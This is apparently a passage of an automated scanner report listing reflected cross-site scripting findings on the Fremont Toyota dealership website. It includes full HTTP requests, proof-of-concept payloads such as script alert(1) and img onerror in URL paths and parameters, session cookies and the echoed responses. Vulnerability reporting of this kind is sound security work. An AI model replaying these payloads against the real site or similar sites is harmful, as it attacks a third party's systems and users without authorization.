Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:24 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:25 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:06:25 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza7f40e'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Venza7f40e'><img src=a onerror=alert(1)>6fbc1bf8bf6'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97024"><img%20src%3da%20onerror%3dalert(1)>7d26f203fee was submitted in the REST URL parameter 2. This input was echoed as 97024"><img src=a onerror=alert(1)>7d26f203fee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Yaris97024"><img%20src%3da%20onerror%3dalert(1)>7d26f203fee/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:15:28 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:15:28 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:15:29 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris97024"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Yaris97024"><img src=a onerror=alert(1)>7d26f203fee at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Yaris97024"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e8bd<img%20src%3da%20onerror%3dalert(1)>1a28b592aab was submitted in the REST URL parameter 2. This input was echoed as 3e8bd<img src=a onerror=alert(1)>1a28b592aab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Yaris3e8bd<img%20src%3da%20onerror%3dalert(1)>1a28b592aab/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:18:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:18:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:18:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris3e8bd<i ...[SNIP]... <H1> Toyota Yaris3e8bd<img src=a onerror=alert(1)>1a28b592aab</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6512f'><img%20src%3da%20onerror%3dalert(1)>4ee7694739 was submitted in the REST URL parameter 2. This input was echoed as 6512f'><img src=a onerror=alert(1)>4ee7694739 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

GET /Toyota/Yaris6512f'><img%20src%3da%20onerror%3dalert(1)>4ee7694739/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:16:44 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:16:45 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 04:16:45 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris6512f'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Yaris6512f'><img src=a onerror=alert(1)>4ee7694739'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 591e9'><script>alert(1)</script>4c72ff10cba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota591e9'><script>alert(1)</script>4c72ff10cba/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:06:14 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:06:15 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 31518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles ...[SNIP]... <OPTION VALUE='/confid_fremonttoyota591e9'><script>alert(1)</script>4c72ff10cba/year_/make_Toyota/'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload de9b1</title><script>alert(1)</script>c3de2be6687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotade9b1</title><script>alert(1)</script>c3de2be6687/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:09:41 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:09:42 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 14651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotade9b1</title><script>alert(1)</script>c3de2be6687 Vehicles - Fremont Toyota</TITLE> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7b26'><script>alert(1)</script>098fb43cbf3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotad7b26'><script>alert(1)</script>098fb43cbf3/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:09:32 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:09:33 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 14543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotad7b26'><sc ...[SNIP]... <OPTION VALUE='/carresearch/BodystylesGroup/confid_fremonttoyota/year_/make_Toyotad7b26'><script>alert(1)</script>098fb43cbf3/'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d5870><script>alert(1)</script>4f330d97cd8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotad5870><script>alert(1)</script>4f330d97cd8/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:09:35 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:09:36 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 14525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotad5870><scr ...[SNIP]... <IMG SRC=http://group.autofusion.com/images/toyotad5870><script>alert(1)</script>4f330d97cd8_logo.gif ALT="Toyotad5870> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db85"><script>alert(1)</script>735a1ae63d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota7db85"><script>alert(1)</script>735a1ae63d/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:09:30 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:09:31 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 14525
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bcd61<script>alert(1)</script>de00dbdb85a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotabcd61<script>alert(1)</script>de00dbdb85a/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:09:37 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:09:38 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 14507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotabcd61<scri ...[SNIP]... <TD CLASS="model_header" VALIGN=TOP> New Toyotabcd61<script>alert(1)</script>de00dbdb85a Models<BR> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the HTML document as text between TITLE tags. The payload 9d9c7</title><script>alert(1)</script>fc484791137 was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request

GET /inventory.php?&VehicleType=New9d9c7</title><script>alert(1)</script>fc484791137 HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:10:38 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 36905

<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New9d9c7</title><script>alert(1)</script>fc484791137 Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21c2"><script>alert(1)</script>aaebb356997 was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request

GET /inventory.php?&VehicleType=Newb21c2"><script>alert(1)</script>aaebb356997 HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:56:49 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 36805

<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Newb21c2"><script>alert(1)</script>aaebb356997 Inventory Search - Fremont Toyota - Toyota - Se ...[SNIP]... <meta name="description" content="Search our online inventory for Newb21c2"><script>alert(1)</script>aaebb356997 cars at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the HTML document as plain text between tags. The payload 1bafc<script>alert(1)</script>c71526176cb was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request

GET /inventory.php?&VehicleType=New1bafc<script>alert(1)</script>c71526176cb HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:08:19 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 36736
The value of the Model request parameter is copied into the HTML document as text between TITLE tags. The payload 9d296</title><script>alert(1)</script>2ee433e8a41 was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request

GET /inventory.php?VehicleType?=New&Model=9d296</title><script>alert(1)</script>2ee433e8a41 HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:32:11 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 40043

<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>9d296</title><script>alert(1)</script>2ee433e8a41 Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the Model request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42a8"><script>alert(1)</script>0d87e64093f was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType?=New&Model=a42a8"><script>alert(1)</script>0d87e64093f HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:18:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 39937
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>a42a8"><script>alert(1)</script>0d87e64093f Inventory Search - Fremont Toyota - Toyota - Servi ...[SNIP]... <meta name="description" content="Search our online inventory for a42a8"><script>alert(1)</script>0d87e64093f at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the Model request parameter is copied into the HTML document as plain text between tags. The payload 186d3<script>alert(1)</script>6628cbde463 was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType?=New&Model=186d3<script>alert(1)</script>6628cbde463 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:30:14 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 39866
The value of the VehicleType request parameter is copied into the HTML document as plain text between tags. The payload 5f0c1<script>alert(1)</script>e9ac330026e was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
